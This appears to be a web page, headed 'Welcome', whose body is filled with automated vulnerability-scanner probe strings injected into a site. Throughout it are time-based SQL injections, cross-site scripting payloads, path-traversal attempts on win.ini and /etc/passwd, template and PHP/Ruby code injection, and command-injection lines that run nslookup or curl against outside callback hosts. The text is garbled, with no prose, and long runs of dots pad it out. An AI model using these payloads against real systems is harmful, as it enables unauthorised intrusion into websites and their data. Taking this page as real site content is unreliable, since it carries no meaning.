首页

Welcome

@@7YZUK

��%2527%2522\'\"

'"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1P2Hj5Weo')) OR 456=(SELECT 456 FROM PG_SLEEP(15))--

1zdDPfNW2') OR 813=(SELECT 813 FROM PG_SLEEP(15))--

1LiQdVr8j' OR 899=(SELECT 899 FROM PG_SLEEP(15))--

1-1)) OR 645=(SELECT 645 FROM PG_SLEEP(15))--

1-1) OR 114=(SELECT 114 FROM PG_SLEEP(15))--

1-1 OR 356=(SELECT 356 FROM PG_SLEEP(15))--

1ahvE6T50')); waitfor delay '0:0:15' --

1ny1DxZHX'); waitfor delay '0:0:15' --

1Cr3rV865'; waitfor delay '0:0:15' --

1-1 waitfor delay '0:0:15' --

1-1)); waitfor delay '0:0:15' --

1<asQFGa5<

1<img sRc='http://attacker-9943/log.php?

1<a0qQ9Mz x=9913>

1<ifRAme sRc=9730.com></IfRamE>

1-1); waitfor delay '0:0:15' --

1<WPRDY8>ANXVL[!+!]</WPRDY8>

10HBaO

1}body{zzz:Expre/**/SSion(zl5U(9704))}

1<input autofocus onfocus=zl5U(9112)>

�<img zzz onmouseover=zl5U(96831) //�>

1<ScRiPt>zl5U(9692)</sCripT>

1-1; waitfor delay '0:0:15' --

1\u003CScRiPt\zl5U(9905)\u003C/sCripT\u003E

WEB-INF\web.xml

%31%3C%53%63%52%69%50%74%20%3E%7A%6C%35%55%289208%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9661)>

WEB-INF/web.xml

1<img src=xyz OnErRor=zl5U(9918)>

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<img src=//xss.bxss.me/t/dot.gif onload=zl5U(9795)>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

..\..\..\..\..\..\..\..\windows\win.ini

1<body onload=zl5U(9859)>

(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9315'>

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1<isindex type=image src=1 onerror=zl5U(9333)>

1<svg

� onload=zl5U(9632);>

/../../../../../../../../../../boot.ini

1<InvalidTag

>zl5U(9242)</ScRiPt>

../../../../../../../../../../windows/win.ini%00.jpg

C:\WINDOWS\system32\drivers\etc\hosts

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9030></ScRiPt>

file:///etc/passwd

1<InvalidTag

>zl5U(9719)</ScRiPt>

10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%7A%6C%35%55%28%39%32%34%34%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<InvalidTag>zl5U(9104)</script>9104

../../../../../../../../../../../../../../windows/win.ini

1<InvalidTag>zl5U(9840)</script>

../../../../../../../../../../../../../../etc/passwd

1<W5LYYR>C7VVT[!+!]</W5LYYR>

1<InvalidTag >zl5U(9507)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

;(nslookup -q=cname hityumxvgfmfzffee2.bxss.me||curl hityumxvgfmfzffee2.bxss.me)|(nslookup -q=cname hityumxvgfmfzffee2.bxss.me||curl hityumxvgfmfzffee2.bxss.me)&(nslookup -q=cname hityumxvgfmfzffee2.bxss.me||curl hityumxvgfmfzffee2.bxss.me)

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

`(nslookup -q=cname hithjmivvjmwibadb6.bxss.me||curl hithjmivvjmwibadb6.bxss.me)`

10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z

/\xfs.bxss.me?hkbakels.com.hk

//xfs.bxss.me?hkbakels.com.hk

|(nslookup -q=cname hitmykkkmvdjtc3a96.bxss.me||curl hitmykkkmvdjtc3a96.bxss.me)

xfs.bxss.me?hkbakels.com.hk

&(nslookup -q=cname hiteovvptcqhff4cd4.bxss.me||curl hiteovvptcqhff4cd4.bxss.me)&'\"`0&(nslookup -q=cname hiteovvptcqhff4cd4.bxss.me||curl hiteovvptcqhff4cd4.bxss.me)&`'

http://xfs.bxss.me?hkbakels.com.hk

938433

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

&nslookup -q=cname hitsulaygxfrx64652.bxss.me&'\"`0&nslookup -q=cname hitsulaygxfrx64652.bxss.me&`'

<th:t="${dfb}#foreach

xfs.bxss.me

$(nslookup -q=cname hitwgolsdeimx08567.bxss.me||curl hitwgolsdeimx08567.bxss.me)

bxss.me

(nslookup -q=cname hitcirgpkkwje69f2e.bxss.me||curl hitcirgpkkwje69f2e.bxss.me))

c:/windows/win.ini

|echo lkzhpj$()\ wyjlix\nz^xyu||a #' |echo lkzhpj$()\ wyjlix\nz^xyu||a #|" |echo lkzhpj$()\ wyjlix\nz^xyu||a #

<%={{={@{#{${dfb}}%>

&echo qnkizq$()\ lhwwti\nz^xyu||a #' &echo qnkizq$()\ lhwwti\nz^xyu||a #|" &echo qnkizq$()\ lhwwti\nz^xyu||a #

/etc/shells

bfgx10392%C0%BEz1%C0%BCz2a%90bcxhjl10392

http://bxss.me/t/fit.txt%3F.jpg

echo joykrq$()\ snxzrm\nz^xyu||a #' &echo joykrq$()\ snxzrm\nz^xyu||a #|" &echo joykrq$()\ snxzrm\nz^xyu||a #

Http://bxss.me/t/fit.txt

bfg2511%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl2511

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

19956511

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

1*if(now()=sysdate(),sleep(15),0)

'"()&%<zzz><InvalidTag >zl5U(9394)</ScRiPt>

1'"()&%<zzz><InvalidTag >zl5U(9174)</ScRiPt>

'.print(md5(31337)).'

${@print(md5(31337))}\

/\xfs.bxss.me?hkbakels.com.hk

<!--

${@print(md5(31337))}

//xfs.bxss.me?hkbakels.com.hk

-1" OR 3*2>(0+5+237-237) --

";print(md5(31337));$a="

';print(md5(31337));$a='

-1" OR 3*2<(0+5+237-237) --

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

-1" OR 3+237-237-1=0+0+0+1 --

WEB-INF\web.xml

bxss.me/t/xss.html?%00

19422990

-1" OR 2+237-237-1=0+0+0+1 --

'+'A'.concat(70-3).concat(22*4).concat(118).concat(76).concat(102).concat(65)+(require'socket'

Socket.gethostbyname('hitlr'+'liyjvtvtd0c75.bxss.me.')[3].to_s)+'

-1' OR 3+453-453-1=0+0+0+1 or '4wgpsg8o'='

WEB-INF/web.xml

HttP://bxss.me/t/xss.html?%00

"+"A".concat(70-3).concat(22*4).concat(122).concat(85).concat(107).concat(86)+(require"socket"

Socket.gethostbyname("hitfk"+"oiygnvsrdd966.bxss.me.")[3].to_s)+"

-1' OR 2+453-453-1=0+0+0+1 or '4wgpsg8o'='

'"()&%<zzz><InvalidTag >zl5U(9681)</ScRiPt>

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

xfs.bxss.me?hkbakels.com.hk

"||sleep(27*1000)*vmdfnv||"

1'"()&%<zzz><InvalidTag >zl5U(9186)</ScRiPt>

"+response.write(9844652*9828701)+"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

-1' OR 3*2>(0+5+733-733) --

'||sleep(27*1000)*ycztdc||'

"&&sleep(27*1000)*auhsnc&&"

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1' OR 3*2<(0+5+733-733) --

'+response.write(9844652*9828701)+'

'&&sleep(27*1000)*zckmjw&&'

response.write(9844652*9828701)

<!--

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

'"()

http://xfs.bxss.me?hkbakels.com.hk

-1' OR 3+733-733-1=0+0+0+1 --

'"

-1' OR 2+733-733-1=0+0+0+1 --

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

-1 OR 3+797-797-1=0+0+0+1

960526

..\..\..\..\..\..\..\..\windows\win.ini

-1 OR 2+797-797-1=0+0+0+1

xfs.bxss.me

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1 OR 3*2>(0+5+937-937) --

-1 OR 3*2<(0+5+937-937) --

bxss.me/t/xss.html?%00

bxss.me

^(#$!@#$)(()))******

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

HttP://bxss.me/t/xss.html?%00

!(()&&!|*|*|

'+'A'.concat(70-3).concat(22*4).concat(121).concat(78).concat(114).concat(67)+(require'socket'

/../../../../../../../../../../boot.ini

c:/windows/win.ini

"+"A".concat(70-3).concat(22*4).concat(111).concat(76).concat(109).concat(82)+(require"socket"

/etc/shells

${10000162+10000201}

-1 OR 3+937-937-1=0+0+0+1 --

../../../../../../../../../../windows/win.ini%00.jpg

http://bxss.me/t/fit.txt%3F.jpg

"+response.write(9282433*9571588)+"

)

C:\WINDOWS\system32\drivers\etc\hosts

<esi:include src="http://bxss.me/rpb.png"/>

'+response.write(9282433*9571588)+'

Http://bxss.me/t/fit.txt

-1 OR 2+937-937-1=0+0+0+1 --

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

response.write(9282433*9571588)

file:///etc/passwd

${9999825+9999789}

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

<esi:include src="http://bxss.me/rpb.png"/>

Mr.

555

../../../../../../../../../../../../../../windows/win.ini

;(nslookup -q=cname hitgjzigopbzl79d73.bxss.me||curl hitgjzigopbzl79d73.bxss.me)|(nslookup -q=cname hitgjzigopbzl79d73.bxss.me||curl hitgjzigopbzl79d73.bxss.me)&(nslookup -q=cname hitgjzigopbzl79d73.bxss.me||curl hitgjzigopbzl79d73.bxss.me)

`(nslookup -q=cname hitjgddirqzyd2c863.bxss.me||curl hitjgddirqzyd2c863.bxss.me)`

../../../../../../../../../../../../../../etc/passwd

".gethostbyname(lc("hitzd"."walvlmvvbc23b.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(65).chr(118).chr(84)."

'.gethostbyname(lc('hitpq'.'ifjawlczd2ae0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(76).chr(112).chr(76).'

./Mr.

555

XVV1781p

|(nslookup -q=cname hitfhstaaoqpy42659.bxss.me||curl hitfhstaaoqpy42659.bxss.me)

/../../../../../../../../../../windows/system32/BITSADMIN.exe

../Mr.

555

../Mr.

555

&(nslookup -q=cname hitevjuqzxrkka5c41.bxss.me||curl hitevjuqzxrkka5c41.bxss.me)&'\"`0&(nslookup -q=cname hitevjuqzxrkka5c41.bxss.me||curl hitevjuqzxrkka5c41.bxss.me)&`'

'.print(md5(31337)).'

"||sleep(271000)doaeey||"

Mr.

555

&nslookup -q=cname hitbpmxnymctk60ab3.bxss.me&'\"`0&nslookup -q=cname hitbpmxnymctk60ab3.bxss.me&`'

$(nslookup -q=cname hitkqohojcviwd4dd3.bxss.me||curl hitkqohojcviwd4dd3.bxss.me)

${@print(md5(31337))}\

'||sleep(271000)fgswdt||'

file:///etc/passwd

555

(nslookup -q=cname hitreixpveahb0da09.bxss.me||curl hitreixpveahb0da09.bxss.me))

|echo qumzfu$()\ fsnddo\nz^xyu||a #' |echo qumzfu$()\ fsnddo\nz^xyu||a #|" |echo qumzfu$()\ fsnddo\nz^xyu||a #

1a224ze8O

${@print(md5(31337))}

&n979703=v902390

"&&sleep(271000)gcvgbk&&"

&echo aqytdq$()\ qbzpdw\nz^xyu||a #' &echo aqytdq$()\ qbzpdw\nz^xyu||a #|" &echo aqytdq$()\ qbzpdw\nz^xyu||a #

../../../../../../../../../../../../../../windows/win.ini

555

../../../../../../../../../../../../../../windows/win.ini

555

/../../../../../../../../../../windows/system32/BITSADMIN.exe

";print(md5(31337));$a="

echo jrjuuy$()\ hrqoyy\nz^xyu||a #' &echo jrjuuy$()\ hrqoyy\nz^xyu||a #|" &echo jrjuuy$()\ hrqoyy\nz^xyu||a #

fPSLRBce

../../../../../../../../../../../../../../etc/passwd

555

../../../../../../../../../../../../../../etc/passwd

555

';print(md5(31337));$a='

'&&sleep(271000)propun&&'

Mr.

555

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

^(#$!@#$)(()))******

".gethostbyname(lc("hitvr"."plukqmbu8be5c.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(65).chr(117).chr(72)."

&n928944=v932202

!(()&&!|||

'"()

Mr.

555

